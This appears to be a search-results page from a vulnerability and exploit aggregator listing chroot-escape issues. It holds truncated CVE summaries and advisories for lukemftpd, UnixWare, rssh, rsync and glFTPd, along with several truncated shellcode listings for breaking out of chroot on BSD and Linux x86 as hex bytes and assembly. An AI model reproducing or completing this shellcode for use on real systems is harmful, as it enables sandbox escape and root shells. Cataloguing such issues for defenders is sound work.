CVE-2005-1339

CVE-2005-1339 affects Mac OS X 10.3.9 where lukemftpd allows remote authenticated users to escape the chroot by logging in with their full name. The issue is rooted in lukemftpd’s chroot handling. Impact: enables escape from a restricted root environment (as described in the CVE entry and corrobo...

CVE-2005-1339

lukemftpd in Mac OS X 10.3.9 allows remote authenticated users to escape the chroot environment by logging in with their full name...

Postfix mail server IPv6 configuration unauthorized mail relaying

In specific configurations, for example if ran in chroot environment on IPv6 network, message relaying is not limited allowing relay to be used for SPAM sending...

CVE-2004-1124

CVE-2004-1124 describes a local privilege/escape issue in SCO UnixWare 7.1.1–7.1.4 where the chroot jail can be broken, enabling local users to escape and perform unauthorized actions. The vulnerability affects specific binaries listed by SCO (e.g., /etc/conf/pack.d/namefs/Driver_atup.o, Driver_m...

CVE-2004-1124

Unknown vulnerability in chroot on SCO UnixWare 7.1.1 through 7.1.4 allows local users to escape the chroot jail and conduct unauthorized activities...

UnixWare 7.1.4 UnixWare 7.1.3 UnixWare 7.1.1 : chroot A known exploit can break a chroot prison.

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SCO Security Advisory Subject: UnixWare 7.1.4 UnixWare 7.1.3 UnixWare 7.1.1 : chroot A known exploit can break a chroot prison. Advisory number: SCOSA-2005.2 Issue date: 2005 January 14 Cross reference: sr887824 fz528555 erg712509 CAN-2004-1124 1...

SCO UnixWare chroot protection bypass

No description provided...

CVE-2004-0609

rssh 2.0 through 2.1.x expands command line arguments before entering a chroot jail, which allows remote authenticated users to determine the existence of files in a directory outside the jail...

CVE-2004-0792

Directory traversal vulnerability in the sanitizepath function in util.c for rsync 2.6.2 and earlier, when chroot is disabled, allows attackers to read or write certain files...

Directory Traversal

Overview Affected versions of this package are vulnerable to Directory Traversal. Directory traversal vulnerability in the sanitizepath function in util.c for rsync 2.6.2 and earlier, when chroot is disabled, allows attackers to read or write certain files. Remediation There is no fixed version f...

CVE-2004-0792

Directory traversal vulnerability in the sanitizepath function in util.c for rsync 2.6.2 and earlier, when chroot is disabled, allows attackers to read or write certain files...

bsd/x86 break chroot 45 bytes

No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 45 bytes. -break chrooted / char shellcode= "\x68\x62\x2e\x2e\x2e" / pushl $0x2e2e2e62 / "\x89\xe7" / movl %esp,%edi / "\x33\xc0" / xorl %eax,%eax / "\x88\x47\x03" / movb %al,0x3%edi / "\x57" /...

bsd/x86 - break chroot 45 bytes

bsd/x86 break chroot 45 bytes. Shellcode exploit for bsdx86 platform / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 45 bytes. -break chrooted / char shellcode= "\x68\x62\x2e\x2e\x2e" / pushl $0x2e2e2e62 / "\x89\xe7" / movl %esp,%edi / "\x33\xc0" / xorl %eax,%eax / "\x88\x47\x03...

bsd/x86 break chroot 45 bytes

Exploit for bsd/x86 platform in category shellcode ============================= bsd/x86 break chroot 45 bytes ============================= / BSD version FreeBSD, OpenBSD, NetBSD. email protected 45 bytes. -break chrooted / char shellcode= "\x68\x62\x2e\x2e\x2e" / pushl $0x2e2e2e62 / "\x89\xe7" ...

advisory-05-glFTPd.txt

------------------------------------------------- No System Group - Advisory 05 - 18/09/04 ------------------------------------------------- Program: glFTPd Homepage: http://www.glftpd.com Vulnerable Versions: glFTPd v2.00RC3 and prior Risk: Low / Medium Impact: Local Stack Buffer Overflow...

linux/x86 break chroot execve /bin/sh 80 bytes

Exploit for linux/x86 platform in category shellcode ============================================== linux/x86 break chroot execve /bin/sh 80 bytes ============================================== / This is Linux chroot/execve code.It is 80 bytes long.I have some ideas how to make it smaller, but ti...

linux/x86 break chroot 46 bytes

Exploit for linux/x86 platform in category shellcode =============================== linux/x86 break chroot 46 bytes =============================== / The setuid0+chroot shellcode it will put '../' 10 times Size 46 bytes OS BSD /rootteam/dev0id www.sysworld.net email protected BITS 32 jmp short...

linux/x86 break chroot 34 bytes

No description provided by source. / The setuid0+chroot shellcode. It is the one of the smallest shellcodes in the !!world!! it will put '../' 10 times Size 34 bytes OS BSD /rootteam/dev0id www.sysworld.net [email protected] BITS 32 xor ecx,ecx xor eax,eax push eax mov al,0x17 push eax int 0x...

linux/x86 break chroot 46 bytes

No description provided by source. / The setuid0+chroot shellcode it will put '../' 10 times Size 46 bytes OS BSD /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short callme main: pop esi mov edi,esi xor ecx,ecx push ecx mov al,0x17 push eax int 0x80 xor eax,eax push eax mov...

linux/x86 break chroot execve /bin/sh 80 bytes

No description provided by source. / This is Linux chroot/execve code.It is 80 bytes long.I have some ideas how to make it smaller, but till then use this one. signed predator linux registered user : 181116 preedatoratsendmaildotru / char...